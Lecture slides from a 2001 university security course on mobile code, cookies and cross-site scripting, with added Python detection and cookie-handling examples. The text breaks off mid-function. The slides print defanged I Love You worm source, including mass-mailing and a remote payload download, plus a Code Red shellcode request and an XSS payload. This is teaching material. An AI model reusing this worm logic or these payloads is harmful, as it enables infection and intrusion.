20-771: Computer Security Lecture 5: ATTACK WEEK


20-771: Computer Security
Lecture 5: ATTACK WEEK
Robert Thibadeau
School of Computer Science
Carnegie Mellon University
Institute for eCommerce, Fall 2000
Lecture 5, 20-771: Computer Security, Fall 2001
1
Today’s lecture
• Mobile Code
• Break (10 min)
• Cookies
• Cross Machine Scripting
This Week
Chapters 6,7 WS
More on Linux
http://xiotech.ulib.org/class
X.509v3
• Need a public key to open it – i.e., you can authenticate the source
• Contains encrypted information that the source can communicate to you in privacy and with authority.
  – Authenticated, private, tamperproof, authorization
• Can be employed as the basis for PKI: chaining authority
  – Pass something up the chain for approval (signing) to provide the absolute authority
  – I.e., the President’s office confirms such and such directive.
X.509v3 Certificate
-----BEGIN CERTIFICATE-----
MIIDNjCCAp+gAwIBAgIBATANBgkqhkiG9w0BAQQFADCBqTELMAkGA1UEBhMCWFkx
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
-----END CERTIFICATE-----
X.509v3 Opened!
Certificate:
Data:
Version: 3 (0x2)
Serial Number: 1 (0x1)
Signature Algorithm: md5WithRSAEncryption
Issuer: C=XY, ST=Snake Desert, L=Snake Town, O=Snake
Oil, Ltd, OU=Certificate Authority, CN=Snake Oil
CA/[email protected]
Validity
Not Before: Oct 21 18:21:51 1999 GMT
Not After : Oct 20 18:21:51 2001 GMT
Subject: C=XY, ST=Snake Desert, L=Snake Town, O=Snake
Oil, Ltd, OU=Webserver Team,
CN=www.snakeoil.dom/[email protected]
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public Key: (1024 bit)
Modulus (1024 bit):
X.509v3 Opened 2
KEY : 00:b9:e7:84:68:f9:51:f4:74:93:8d:aa:58:cf:05:
6f:82:ef:63:03:34:63:72:f5:e5:e7:cd:e8:d7:ad:
cc:ec:1e:cd:cf:73:dd:95:69:ab:7a:0a:92:04:10:
6b:9e:c8:6d:bd:c5:a8:1b:d6:8e:c6:8f:62:91:82:
95:58:72:67:71:ea:d1:dd:d8:99:05:5b:90:5c:15:
57:d6:5c:be:36:3d:5e:2b:7f:dc:e2:62:89:fc:8d:
6b:1b:2b:66:84:f8:be:a1:0a:d7:1b:c5:d6:c7:38:
66:5d:48:85:99:27:07:3f:d5:5b:3b:d1:2f:fb:22:
65:be:65:db:3c:60:41:62:03 Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Subject Alternative Name:
email:[email protected]
Netscape Comment:
mod_ssl generated custom server certificate
Netscape Cert Type:
SSL Server
Signature Algorithm: md5WithRSAEncryption
7a:31:1b:18:19:35:d4:47:9d:ff:9d:39:11:0d:09:41:76:00:
9c:9e:1c:b7:84:4a:df:98:f3:65:fc:ea:f9:8d:63:a6:ba:e7:
de:21:7a:82:bc:ce:9d:2b:b9:16:fc:a0:5b:a2:e8:b8:a5:f7:
c8:29:45:5a:7c:b5:0c:74:04:55:57:a0:69:20:63:08:e4:b9:
95:14:ad:ec:83:0b:89:d3:5b:ff:f7:48:42:b7:89:13:5a:84:
fc:60:76:c1:2e:d4:21:ec:fc:d6:80:9a:01:01:8e:cc:26:68:
d2:82:e6:02:46:df:75:b1:4e:0a:b3:47:5f:5a:c7:48:b6:4c:
38:b9
Active Content
Also called “Mobile Code”
• Web Browsers can download and execute software automatically without warning.
• Software may damage user’s system or violate privacy.
• Administrator: This can tunnel through firewall protections.
• Case: U.S. Government came close, within two weeks, to an executive order that shut down all “mobile code” in the government.
• Failed: This would “dumb down” Federal employees and make the Government Stupid.
Threats from Mobile Code
• Purposefully malicious
  – Moldovan Connection
    » Sexygirls.com and Erotic2000.com
    » Downloaded and ran viewer; program hung up phone and made long distance call to Moldova, $2 per minute.
    » User taken to site stayed around without knowing charge.
  – “I Love You” Worm: probable accidental escape.
• Big programs have bugs
  – Other people will exploit those bugs
Traditional Threats
• Trojan Horses: Very Serious. Often used for spying (e.g., change the login program to create a back door).
• Virus: Code that replicates itself and inserts into an executable program or file.
• Macro viruses: Viruses written in the macro language of a word processor, or other trusted program. Becomes infectious on other documents.
• Rabbits: Programs that make many copies of themselves. Standalone. Denial of Service.
• Worms: Similar but spread across network.
Many Many Threats
• I Love You
  – Opening email that says “I Love You” from a person you know: Trojan Horse
  – Reads your address book: Privacy Violation
  – Deletes image files: Havoc
  – Across Network: Worm
• Demonstrated
  – Microsoft Outlook could execute seriously destructive and intrusive active content without control of user.
Silent Information Thieves!
Access Log - My NeXT Machine in my office (BSD 4.2) (/private/adm/network)
May 9 03:23:05 nageela ftpd[2184]: refused connect from 209.233.224.173
May 9 05:21:48 nageela ftpd[2203]: gethostbyname(adsl-209-233-224-173.pacbell.net): lookup failure
May 9 05:21:48 nageela ftpd[2203]: refused connect from 209.233.224.173
May 10 06:32:51 nageela ftpd[2509]: connect from vc3-49d.dsl.indra.com
May 10 06:50:45 nageela ftpd[2512]: connect from vc3-49d.dsl.indra.com
May 10 06:50:46 nageela ftpd[2513]: connect from vc3-49d.dsl.indra.com
May 13 07:11:42 nageela ftpd[4267]: connect from bilbo.ee.ualberta.ca
May 16 19:46:24 nageela telnetd[5775]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5776]: connect from 209.208.174.4
May 16 19:46:24 nageela ftpd[5774]: connect from 209.208.174.4
May 16 19:46:24 nageela telnetd[5777]: connect from 209.208.174.4
May 21 03:06:53 nageela telnetd[8119]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela telnetd[8120]: connect from hermes.globalwebdesign.com
May 21 03:06:54 nageela ftpd[8121]: connect from hermes.globalwebdesign.com
May 23 07:06:29 nageela telnetd[9035]: connect from spaceace.vi.ri.cmu.edu
May 24 01:55:35 nageela ftpd[9277]: connect from 208.135.135.76
May 28 05:02:38 nageela ftpd[11282]: connect from cx884963-a.chnd1.az.home.com
May 29 02:16:38 nageela ftpd[11749]: connect from 194.204.246.130
May 30 01:48:50 nageela ftpd[12032]: connect from 140.123.224.37
May 30 02:54:36 nageela ftpd[12051]: connect from u5611a.dorm.ccu.edu.tw
Economic Costs
Computer Economics – 8-01
• Love Bug: $8.7 Billion
• Melissa: $1.2 Billion
• Code Red: $2.6 Billion
  – 250,000 systems in just nine hours on July 19
  – 150,000 in 24 on Aug 1 after warnings
• Repair costs and loss of productivity and unknown cost of asset loss
I Love You Code
(virus has been killed)
had name ‘vxryfunny.vbs’
rxm barok -lovxlxttxr(vbx) <i hatx go to school>
rxm by: spydxr / [email protected] / @GRAMMxRSoft Group / Manila,Philippinxs
dim fso,dirsystxm,dirwin,dirtxmp,filx,vbscopy,dow
Sxt fso = CrxatxObj("Scripting.FilxSystxmObj")
sxt filx = fso.OpxnTxxt(WScript.ScriptFullnamx,1)
vbscopy=filx.RxadAll
I Love You Code 2
main()
sxt wscr=CrxatxObj("WScript.Shxll")
rr=wscr.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout")
wscr.RxgWritx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Windows Scripting Host\Sxttings\Timxout",0,"RxG_DWORD"
Sxt dirwin = fso.GxtSpxcialFoldxr(0)
Sxt dirsystxm = fso.GxtSpxcialFoldxr(1)
Sxt dirtxmp = fso.GxtSpxcialFoldxr(2)
Sxt c = fso.GxtFilx(WScript.ScriptFullNamx)
c.Copy(dirsystxm&"\MSKxrnxl32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystxm&"\Vxry Funny.vbs")
rxgruns()
html()
sprxadtoxmail()
listadriv()
I Love You Code 3 : rxgruns()
sub rxgruns()
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\MSKxrnxl32",dirsystxm&"\MSKxrnxl32.vbs"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\RunSxrvicxs\Win32DLL",dirwin&"\Win32DLL.vbs"
Dn=rxggxt("HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Download Dirory")
rxgcrxatx "HKCU\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","http://www.skyinxt.nxt/~young1s/HJKhjnwxrhjkxcvytwxrtnMTFwxtrdsfmhPnjw6587345gvsdf7679njbvYT/WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_LOCAL_MACHINx\Softwarx\Microsoft\Windows\CurrxntVxrsion\Run\WIN-BUGSFIX",downrxad&"\WIN-BUGSFIX.xxx"
rxgcrxatx "HKxY_CURRxNT_USxR\Softwarx\Microsoft\Intxrnxt xxplorxr\Main\Start Pagx","about:blank"
xnd sub
I Love You Code 4
Listing the Drives on Your Machine
(there were several of these utility-type spies)
sub listadriv
Dim d,dc,s
Sxt dc = fso.Drivxs
For xach d in dc
If d.DrivxTypx = 2 or d.DrivxTypx=3 Thxn
foldxrlist(d.path&"\")
xnd if
Nxxt
listadriv = s
xnd sub
I Love You Code 5
re-writing jpg files
sub inffilxs(foldxrspxc)
sxt f = fso.GxtFoldxr(foldxrspxc)
sxt fc = f.Filxs
for xach f1 in fc
xxt=fso.GxtxxtxnsionNamx(f1.path)
if (xxt="vbs") or (xxt="vbx") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx
xlsxif(xxt="jpg") or (xxt="jpxg") thxn
sxt ap=fso.OpxnTxxtFilx(f1.path,2,trux)
ap.writx vbscopy
ap.closx (did same for mp3 files and others)
I Love You Code 6 : .ini
if (xq<>foldxrspxc) thxn
if (s="mirc32.xxx") or (s="mlink32.xxx") or (s="mirc.ini") or
(s="script.ini") or (s="mirc.hlp") thxn
sxt scriptini=fso.CrxatxTxxtFilx(foldxrspxc&"\script.ini")
scriptini.WritxLinx "[script]"
scriptini.WritxLinx ";mIRC Script"
scriptini.WritxLinx "; Plxasx dont xdit this script... mIRC
will corrupt, if mIRC will"
scriptini.WritxLinx "
corrupt... WINDOWS will aff and
will not run corrly. thanks"
scriptini.WritxLinx ";"
scriptini.WritxLinx ";Khalxd Mardam-Bxy"
scriptini.WritxLinx ";http://www.mirc.com"
scriptini.WritxLinx ";"
scriptini.WritxLinx "n0=on 1:JOIN:#:{"
scriptini.WritxLinx "n1= /if ( $nick == $mx ) { halt }"
scriptini.WritxLinx "n2= /.dcc sxnd $nick "&dirsystxm&"\Vxry
Funny.HTM"
scriptini.WritxLinx "n3=}"
scriptini.closx
xq=foldxrspxc
nxxt
xnd sub
I Love You Code 8 : spread mail
sub sprxadtoxmail()
sxt rxgxdit=CrxatxObj("WScript.Shxll")
sxt out=WScript.CrxatxObj("Outlook.Application")
sxt mapi=out.GxtNamxSpacx("MAPI")
for ctrlists=1 to mapi.AddrxssLists.Count
sxt a=mapi.AddrxssLists(ctrlists)
rxgv=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&a)
if (int(a.Addrxssxntrixs.Count)>int(rxgv)) thxn
for ctrxntrixs=1 to a.Addrxssxntrixs.Count
malxad=a.Addrxssxntrixs(x)
rxgad=""
rxgad=rxgxdit.RxgRxad("HKxY_CURRxNT_USxR\Softwarx\Microsoft\WAB\"&malxad)
if (rxgad="") thxn
sxt malx=out.CrxatxItxm(0)
malx.Rxcipixnts.Add(malxad)
malx.Subj = "fwd: Jokx"
malx.Body = vbcrlf&""
malx.Attachmxnts.Add(dirsystxm&"\Vxry Funny.vbs")
malx.Sxnd
Sxt out=Nothing
Sxt mapi=Nothing
xnd sub
Silent Attacks
• It should be obvious it would not be hard to create a silent worm that sends mail on file systems, files, and address lists (and also all your mail on your local machine).
• We can do this with your web browser too …
… Code Red is only ONE example
Virus Checkers
• Pattern match in secret ways to find viral “fingerprints”
• Use a technique called “finite state automata” to create very fast search over your files.
• If virus is not known already, it will do damage.
• Finding silent viruses may be hard.
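The "finite state automata" search the slide mentions is the Aho-Corasick construction: all signatures are compiled into one automaton so a single pass over a file finds every fingerprint, however many there are. The Python below is an added example written for these notes, not code from the lecture or from any scanner; the signature set is constructed (two entries are taken from the defanged listing earlier in this lecture, the third is a marker that never matches) and so is the sample data.

```python
"""Multi-pattern signature scanner as a finite-state automaton (Aho-Corasick).
Added example, not from the lecture; signatures and samples are constructed."""
from collections import deque


class SignatureAutomaton:
    """One pass over the input reports every signature, whatever their number."""

    def __init__(self, signatures):
        self.goto = [{}]      # goto[state][byte] -> next state (trie edges)
        self.fail = [0]       # fail[state] -> longest proper suffix that is a trie path
        self.out = [[]]       # out[state] -> names of signatures ending in this state
        self.length = {name: len(p) for name, p in signatures.items()}
        for name, pattern in signatures.items():
            self._add(name, pattern)
        self._link()

    def _add(self, name, pattern):
        state = 0
        for byte in pattern:
            nxt = self.goto[state].get(byte)
            if nxt is None:
                nxt = len(self.goto)
                self.goto.append({})
                self.fail.append(0)
                self.out.append([])
                self.goto[state][byte] = nxt
            state = nxt
        self.out[state].append(name)

    def _link(self):
        # Breadth-first so every fail target (shallower) is finished before use.
        queue = deque(self.goto[0].values())      # depth-1 states fail to the root
        while queue:
            state = queue.popleft()
            for byte, nxt in self.goto[state].items():
                f = self.fail[state]
                while f and byte not in self.goto[f]:
                    f = self.fail[f]
                self.fail[nxt] = self.goto[f].get(byte, 0)
                # a signature that is a suffix of this path also matches here
                self.out[nxt] = self.out[nxt] + self.out[self.fail[nxt]]
                queue.append(nxt)

    def scan(self, data):
        """Return (signature name, byte offset) for every occurrence in `data`."""
        hits, state = [], 0
        for pos, byte in enumerate(data):
            while state and byte not in self.goto[state]:
                state = self.fail[state]        # never re-reads input: linear time
            state = self.goto[state].get(byte, 0)
            for name in self.out[state]:
                hits.append((name, pos + 1 - self.length[name]))
        return hits


# Constructed signature set; the first two come from the defanged listing above.
SIGNATURES = {
    "barok-word": b"barok",
    "lovxlxttxr-header": b"barok -lovxlxttxr",
    "wsh-shell-create": b'CrxatxObj("WScript.Shxll")',
    "demo-only-marker": b"DEMO_NOT_A_REAL_SIGNATURE",
}

# Constructed "files": one carrying the defanged header, one clean.
SAMPLE = (b"rxm barok -lovxlxttxr(vbx) <i hatx go to school>\n"
          b'sxt wscr=CrxatxObj("WScript.Shxll")\n')
CLEAN = b"Dear colleague, the quarterly report is attached.\n"

if __name__ == "__main__":
    auto = SignatureAutomaton(SIGNATURES)
    for name, offset in auto.scan(SAMPLE):
        print(f"{name} at offset {offset}")
    print("clean file hits:", auto.scan(CLEAN))
```

The automaton is built once and then reads each file exactly once, which is why a scanner with tens of thousands of fingerprints stays fast; the slide's next point still holds, since a sample whose bytes are not in the table produces no hit at all.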
Break!
Authenticode System
• Windows 2000
• Running code requires an X.509v3 Certificate with an approved CA
• Personal Publishers (ID with Credit Bureau)
• Commercial Publishers (Articles of Incorporation)
• Sign a pledge: “reasonable care consistent with prevailing industry standards to keep code free from viruses, malicious code, and other data that may damage, misappropriate, or otherwise interfere with a third party’s operations.”
• Remedy: Revoke your Certificate (HA!)
Steps you can Take
• Don’t run as administrator/root
• Use Virus Checkers (but watch those companies!!!)
• Backup Often
• Verify the integrity and authenticity of software.
  – A very good idea is to not accept active code without a certificate that guarantees the author can be found!
  – Same principle as “mutually assured destruction” or “keep the pilot on the plane!” He won’t hurt you if you can hurt him.
Finally,
• Even if Adobe is the authentic code writer/distributor, get them to agree to your privacy!
Record of URLs you’ve visited
• Browser History file, document cache, and cookies
  – Unix: spools or /var/adm / Windows: /winnt, /windows, program files/netscape etc.
  – Mobile code can read these.
• Organization’s firewall or proxy server (most have logging capability)
• ISP’s firewall, router, or proxy server.
• Each of the remote servers you’ve visited.
Web Server
• Standard Logs
  – HTTP header information
    » Date, From, URI, Referrer, Response Status to Request
    » Also from HTTPS! (The Server Knows!)
  – Logs are essential to security
• Fancier Logs
  – HTTP
    » What’s in the forms
    » What’s in the responses
• Really fancy
  – Dynamically changing information based on where you’ve been.
  – Tracking across web servers.
Code Red Log
12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 278
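The log entry above is exactly the kind of record the "Standard Logs" slide says is essential to security: the standard fields are enough to spot a Code Red probe and to say whether the server could have been hit. The Python below is an added example for these notes, not the lecture's code or eEye's; it parses common-log-format lines and flags requests for /default.ida that carry the worm's long filler run followed by %u-encoded words. The log lines are constructed (the first is modelled on the slide's entry, with its 224 X characters); the filler letter was N in the original Code Red and X in Code Red II.

```python
"""Flag Code Red probes in web-server access logs.  Added example, not from the
lecture; the sample log lines are constructed."""
import re

# Common / combined log format: host ident user [time] "request" status size
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]*)" (?P<status>\d{3}) (?P<size>\S+)')

# The probe targets the IIS Index Server ISAPI filter through /default.ida with a
# long run of one filler letter (the overflow) and then %u-encoded 16-bit words.
CODE_RED_RE = re.compile(
    r'^/default\.ida\?(?P<filler>[A-Za-z])(?P=filler){99,}.*%u[0-9a-fA-F]{4}')


def parse_line(line):
    """Split one log line into its standard fields, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Name the variant from the filler letter, or None for an ordinary request."""
    m = CODE_RED_RE.match(path)
    if not m:
        return None
    return {"N": "Code Red I", "X": "Code Red II"}.get(
        m.group("filler").upper(), "Code Red variant")


def scan_log(lines):
    """One record per probe: who, when, which variant, and whether the request was
    refused.  A 404 means IIS had no handler for .ida, so the overflow never ran;
    any other status means the request reached the filter and deserves a look."""
    hits = []
    for line in lines:
        rec = parse_line(line)
        if not rec:
            continue
        variant = classify(rec["path"])
        if variant:
            hits.append({"source": rec["host"], "time": rec["time"],
                         "variant": variant, "status": int(rec["status"]),
                         "ida_mapped": rec["status"] != "404"})
    return hits


PAYLOAD_TAIL = ("%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3"
                "%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a")

# Constructed sample log: a Code Red II probe modelled on the slide, two ordinary
# requests (one merely mentioning default.ida), and a Code Red I probe that got a 200.
SAMPLE_LOG = [
    '12.27.8.161 - - [09/Sep/2001:04:07:07 -0400] "GET /default.ida?'
    + "X" * 224 + PAYLOAD_TAIL + ' HTTP/1.0" 404 278',
    '10.0.0.5 - - [09/Sep/2001:04:08:12 -0400] "GET /index.html HTTP/1.0" 200 1043',
    '10.0.0.9 - - [09/Sep/2001:04:09:30 -0400] "GET /default.ida?XXX HTTP/1.0" 404 278',
    '192.0.2.77 - - [09/Sep/2001:05:00:01 -0400] "GET /default.ida?'
    + "N" * 224 + PAYLOAD_TAIL + ' HTTP/1.0" 200 0',
]

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

Reading the result the way the slide reads its entry: the 404 says this server did not map the .ida extension, so the probe bounced off, while the constructed 200 line is the case an administrator would escalate.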
Code Red I and II
http://www.eeye.com/html/Research/Advisories/AL20010804.html
• %u9090
• %u6858
• %ucbd3
• %u7801
• %u9090
• %u6858
• %ucbd3
• %u7801
• %u9090
• %u6858
• %ucbd3
• %u7801
• %u9090
• %u9090
• %u8190
• %u00c3
• %u0003
• %u8b00
• %u531b
Cookies (netscape cookie file)
URL-Invoking-It  domain?  Path in Server  https?  Expiration  Name = value
www.airtime.co.uk FALSE /users/wysywig/ FALSE 968081837 username aaa
www.kbb.com FALSE /kb/ki.dll FALSE 9519638334 zipcode 15638
www.jcpenney.com FALSE /jcp FALSE 126632340 ShopperManager%6Fjcp SHOPPERMANAGER%6FJCP=6EJSN34316NP100L1RURQ8HHF8MX34
www.buy.com FALSE /bc FALSE 128333061 ShopperManager%6F SHOPPERMANAGER%6F=VQ8VSKLCWHSN000CM9C9JS7EDVL1
.doubleclick.net TRUE / FALSE 196034991340 id 39609560
.lycos.com TRUE / FALSE 161735952 CyberTargetAnonymous LYC000AFBAE77275BF6D2734BFCF563A16
.cmgi.com TRUE / FALSE 16173595634 CyberGlobalAnonymous CTG00017D567763405BF1FB34F8BFCD8B1D33
.webcrawler.com TRUE / FALSE 9342341600 registered no
.webcrawler.com TRUE / FALSE 9342341600 UID 210076B35C89A5C
.microsoft.com TRUE / FALSE 1065303482 MC1 GUID=DF160779710D118B1808006BB734F3F
.washingtonpost.com TRUE / FALSE 9342951343 RMID 98c81c8d3606d690
www.americanbible.org FALSE / FALSE 16308113498 Int 343 346 38 3 343 38 30 3 334 68 5 3
www.americanbible.org FALSE / FALSE 1630811600 User Profile F633C7686DA1FDBE85880034CDB11
Cookies (netscape cookie file)
URL-Invoking-It  domain?  Path in Server  https?  Expiration  Name = value
www.antiquebooks.net FALSE / FALSE 938368777 ulantique 7-1-6-win-ns
classics.mit.edu FALSE / FALSE 934285095 ICA_last_work Homer.iliad
.jcpenny.com TRUE / FALSE 60516333438 SITESERVER ID=69bcf8f963456b19fffdf1ff19f
.amazon.com TRUE / FALSE 6086797993 ubid-main 06-6073435981034
nonprofit.guidestar.org FALSE / FALSE 613723673 CFID 95690
.google.com TRUE / FALSE 6134736834347 ID 34816dff31190ff80
.cmu.edu TRUE / FALSE 6051263400 SITESERVER ID=f8185834df6bac5f80a793a534c18
.waterhouse.com TRUE / FALSE 963585098 accountno 35869873
tracking.carprices.com FALSE / FALSE 9634234581 PARTNER CARPRICES
tracking.carprices.com FALSE / FALSE 9634234581 MEMB_ID -1
tracking.carprices.com FALSE / FALSE 9634234581 USER 10.8.1.35-1
tracking.carprices.com FALSE / FALSE 9634234578 RETURN VISITOR
Cookies: Server Writes to Browser
Set-Cookie: NAME=VALUE; expires=DATE; path=PATH; domain=DOMAIN_NAME; secure
NAME=VALUE
expires=DATE
domain=DOMAIN_NAME
  The default value of domain is the host name of the server which generated the cookie response.
path=PATH
  The path attribute is used to specify the subset of URLs in a domain for which the cookie is valid.
secure
  If a cookie is marked secure, it will only be transmitted if the communications channel with the host is a secure one. Currently this means that secure cookies will only be sent to HTTPS (HTTP over SSL) servers. If secure is not specified, a cookie is considered safe to be sent in the clear over unsecured channels.
Browser Volunteers Cookie to Server!
• If Browser visits the URL again, it volunteers cookie name and contents to the URL
  Cookie: NAME1=OPAQUE_STRING1; NAME2=OPAQUE_STRING2 ...
• Server Database can contain
  – Cookie Name
  – Opaque String
  – Who (what IP/Host/User/etc) reported it
  – When
Cookie Source Code
www.mozilla.org
host \t isDomain \t path \t xxx \t expires \t name \t cookie from
http://lxr.mozilla.org/seamonkey/source/extensions/cookie/nsCookie.cpp#2078
JavaScript Interface! Red - read only
Name        Type        Description
path        string      path the cookie applies to
domain      string      domain the cookie applies to
name        string      name of the cookie
value       string      value of the cookie
expires     string      date the cookie expires
url         string      url setting the cookie  TROJAN HORSE OPPORTUNITY!
isSecure    boolean     the cookie is sent over secure connections only
isDomain    boolean     the cookie has a domain attribute
prompt      boolean     user has configured prefs to throw cookie confirm dialog
preference  int         the user's cookie acceptance value
accept()    method      allows the cookie to be set
reject()    method      causes the cookie not to be set
ask()       method      prompt a netlib confirmation dialog (happens during netlib set cookie execution)
confirm()   method      prompt a javascript confirmation dialog (happens during javascript function execution)
Cookies - Notes
• Multiple Set-Cookie headers in single server response.
• Same path but different names will add additional mappings.
• Higher-level path value does not override specific path mappings.
• Expires header lets client purge the mapping but is not required.
• Number of cookies that a client can store at any one time:
  – 300 total cookies
  – 4 kilobytes per cookie
  – 20 cookies per server domain.
• CGI script deletes a cookie by returning the same cookie with an expired time.
  – This requirement makes it difficult for anyone but the originator of a cookie to delete a cookie.
• Set-cookie response header should never be cached.
• If proxy server receives response containing Set-cookie, it should propagate the Set-cookie header to the client, regardless of whether the response was 304 (Not Modified) or 200 (OK).
• Similarly, if a client request contains a Cookie: header, it should be forwarded through a proxy, even if the conditional If-modified-since request is being made.
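The Set-Cookie attributes, the Cookie: header the browser volunteers on its next visit, the Netscape cookie-file layout shown earlier, and the storage and deletion rules in the notes above, as one added Python example written for these notes (not the lecture's code and not Mozilla's): a toy cookie jar that decides which cookies go to a given URL. One detail is assumed from the Netscape specification rather than the slides: when no path attribute is given, the default is the directory of the URL that set the cookie. Every URL, header and cookies.txt line it handles is constructed, a few copied from the slide listings.

```python
"""Toy Netscape-style cookie jar: Set-Cookie parsing, domain/path/secure
matching, deletion by an expired date, and the 300 / 20-per-domain / 4 KB limits.
Added example, not part of the lecture; all sample data is constructed."""
from dataclasses import dataclass
from email.utils import parsedate_to_datetime
from typing import Optional
from urllib.parse import urlsplit

MAX_TOTAL, MAX_PER_DOMAIN, MAX_BYTES = 300, 20, 4096


@dataclass
class Cookie:
    domain: str              # host name, or ".example.com" when set with a domain attribute
    is_domain: bool
    path: str
    secure: bool
    expires: Optional[float]  # epoch seconds; None = session cookie
    name: str
    value: str


def _default_path(url_path):
    # Assumed from the Netscape spec: the setting URL's path up to its last "/"
    return url_path.rsplit("/", 1)[0] or "/"


def _domain_match(host, c):
    # ".doubleclick.net" matches ad.doubleclick.net; a host cookie must match exactly
    return ("." + host).endswith(c.domain) if c.is_domain else host == c.domain


class CookieJar:
    def __init__(self):
        self.cookies = []

    def set_cookie(self, header, url, now):
        """Apply one Set-Cookie header received from `url`; False if rejected."""
        parts = [p.strip() for p in header.split(";")]
        name, _, value = parts[0].partition("=")
        u = urlsplit(url)
        host = (u.hostname or "").lower()
        domain, path, secure, expires = host, _default_path(u.path), False, None
        for attr in parts[1:]:
            key, _, val = attr.partition("=")
            key, val = key.strip().lower(), val.strip()
            if key == "expires":
                try:
                    expires = parsedate_to_datetime(val).timestamp()
                except (TypeError, ValueError):
                    pass                      # unparseable date: keep as session cookie
            elif key == "domain":
                domain = val.lower()
            elif key == "path":
                path = val
            elif key == "secure":
                secure = True
        is_domain = domain.startswith(".")
        # a server may only set cookies for its own host or a domain it belongs to
        if (is_domain and not ("." + host).endswith(domain)) or (not is_domain and domain != host):
            return False
        if len(name) + len(value) > MAX_BYTES:
            return False
        # same (domain, path, name) replaces the old mapping; a higher-level path
        # leaves a more specific mapping alone because the path differs
        self.cookies = [c for c in self.cookies
                        if (c.domain, c.path, c.name) != (domain, path, name)]
        if expires is not None and expires <= now:
            return True                       # an already-expired cookie deletes the mapping
        same = [c for c in self.cookies if c.domain == domain]
        if len(same) >= MAX_PER_DOMAIN:
            self.cookies.remove(same[0])      # evict the oldest for that domain
        if len(self.cookies) >= MAX_TOTAL:
            self.cookies.pop(0)               # evict the oldest overall
        self.cookies.append(Cookie(domain, is_domain, path, secure, expires, name, value))
        return True

    def cookie_header(self, url, now):
        """What the browser volunteers as its Cookie: header when visiting `url`."""
        self.cookies = [c for c in self.cookies if c.expires is None or c.expires > now]
        u = urlsplit(url)
        host = (u.hostname or "").lower()
        sent = [c for c in self.cookies
                if _domain_match(host, c) and u.path.startswith(c.path)
                and (not c.secure or u.scheme == "https")]
        sent.sort(key=lambda c: len(c.path), reverse=True)   # most specific path first
        return "; ".join(f"{c.name}={c.value}" for c in sent)

    def load_netscape_file(self, text):
        """Read cookies.txt lines: host, isDomain, path, secure, expires, name, value."""
        for line in text.splitlines():
            if not line.strip() or line.startswith("#"):
                continue
            host, is_dom, path, sec, exp, name, value = line.split("\t", 6)
            self.cookies.append(Cookie(host.lower(), is_dom == "TRUE", path,
                                       sec == "TRUE", float(exp), name, value))


if __name__ == "__main__":
    jar, now = CookieJar(), 1_000_000_000.0          # constructed clock: 9 Sep 2001
    jar.set_cookie("zipcode=15638; path=/kb", "http://www.kbb.com/kb/ki.dll", now)
    jar.set_cookie("sess=abc; path=/; secure", "https://www.buy.com/bc/cart", now)
    print(jar.cookie_header("http://www.kbb.com/kb/ki.dll", now))   # zipcode=15638
    print(repr(jar.cookie_header("http://www.buy.com/bc/cart", now)))  # '' (secure, not https)
```

The jar makes the notes concrete: a foreign domain attribute is refused, the secure flag keeps a cookie off plain HTTP, an expired date is the only way the originator removes a mapping, and the twenty-first cookie for a domain pushes out the oldest.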
Two Sides
• Buyer wants things without exposing any information he discloses to any use other than what they MUST have to give him the things he wants. (Cryptophilia)
• Seller wants to know as much about Buyer as possible because this gives him control over Buyers and therefore revenue. He can also sell this information (e.g., to advertisers). He wants unrestricted use of this information.
• BUT, Buyers now collect information on Sellers and misuse that (The Sky is Falling.)
• An Agreement is bilateral. The Internet can make possible agreements public and thereby expose both Sellers and Buyers to violations.
Cross Site Scripting
• Same as cross machine cookies
• Fill in a form with a script: <script>alert('Gotcha!');</script>
• Web Server returns blindly, printing the script
• Filter these characters out: < > " ' % ; ) ( & + -
  But what about the situation where you want somebody to click you and know where they clicked from (double click)?
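The three server behaviours the slide contrasts, as an added Python example written for these notes (not the lecture's code): the server that echoes form input blindly, the character filter the slide lists, and HTML entity encoding of the output as the alternative a practitioner would reach for, since it keeps legitimate text such as a name with an apostrophe or an ampersand intact instead of dropping characters. The form input is constructed; the script payload is the one on the slide.

```python
"""Reflecting form input: blind echo, the slide's character filter, and HTML
output encoding.  Added example, not from the lecture; inputs are constructed."""
import html

FILTERED = set('<>"\'%;)(&+-')        # the characters the slide says to filter out


def render_unsafe(name):
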